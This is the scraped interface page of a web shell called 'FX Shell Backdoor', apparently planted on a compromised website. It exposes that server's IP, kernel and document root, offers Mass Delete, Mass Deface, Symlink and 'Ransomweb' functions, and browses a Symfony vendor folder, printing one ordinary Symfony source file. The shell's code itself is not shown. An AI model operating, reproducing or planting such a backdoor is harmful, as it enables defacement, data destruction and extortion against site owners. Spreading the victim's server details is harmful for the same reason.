FX Shell Backdoor
Home
Tools
Mass Delete
Mass Deface
Symlink
About
Website : vivehg.com
Ip Address : 172.31.2.149
Port : 443
Kernel : Linux 52-72-122-155.cprapid.com 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 06:59:36 UTC 2025 x86_64
Protokol : HTTP/1.1
Save Data :
Koneksi :
Server : Apache
Root : /home/vivehg/public_html
G-Interface : CGI/1.1
R-Method : GET
Browser : Lainnya
Version Shell : 1.0 (Release candidate)
Author : FierzaXploit/Mr.MF33
Type
Name
options
PATH :
/
home
/
ubuntu
/
vendor
/
symfony
/
routing
/
Loader
/
Configurator
/
Upload
Buat File
Buat Folder
Buat Ransomweb
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Routing\Loader\Configurator; use Symfony\Component\DependencyInjection\Exception\InvalidArgumentException; use Symfony\Component\Routing\Alias; class AliasConfigurator { private $alias; public function __construct(Alias $alias) { $this->alias = $alias; } /** * Whether this alias is deprecated, that means it should not be called anymore. * * @param string $package The name of the composer package that is triggering the deprecation * @param string $version The version of the package that introduced the deprecation * @param string $message The deprecation message to use * * @return $this * * @throws InvalidArgumentException when the message template is invalid */ public function deprecate(string $package, string $version, string $message): self { $this->alias->setDeprecated($package, $version, $message); return $this; } }
Traits
Choose...
Rename
Delete
Now
AliasConfigurator.php
Choose...
Edit
Rename
Delete
Now
CollectionConfigurator.php
Choose...
Edit
Rename
Delete
Now
ImportConfigurator.php
Choose...
Edit
Rename
Delete
Now
RouteConfigurator.php
Choose...
Edit
Rename
Delete
Now
RoutingConfigurator.php
Choose...
Edit
Rename
Delete
Now
Traits
Choose...
Edit
Rename
Delete
Now